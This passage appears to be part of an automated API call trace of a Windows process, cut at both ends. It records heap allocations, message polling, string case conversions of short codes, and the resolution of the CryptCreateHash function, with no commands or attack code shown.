Size=0x10) returned 0x2aa9e50 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9da8 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0088.349] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0088.349] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0088.350] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0088.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2aae878 [0088.350] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.350] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.351] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0088.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0088.351] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0088.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.351] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0088.351] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.351] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0088.352] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0088.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.352] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0088.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0088.352] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0088.352] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0088.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0088.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0088.352] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0088.352] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0088.353] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0088.353] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.353] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.353] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0088.354] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.354] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0088.354] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.354] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.354] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0088.354] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.354] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0088.354] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.354] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.354] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0088.355] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0088.355] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.355] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0088.355] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.355] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.355] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0088.355] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0088.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0088.355] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0088.356] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0088.356] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.356] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0088.356] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.356] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0088.356] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0088.356] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0088.356] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0088.356] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0088.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.357] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0088.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0088.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0088.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aa9f28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0088.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0088.357] GetProcAddress (hModule=0x76390000, lpProcName="CryptCreateHash") returned 0x763aeed0 [0088.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0088.357] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0088.357] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 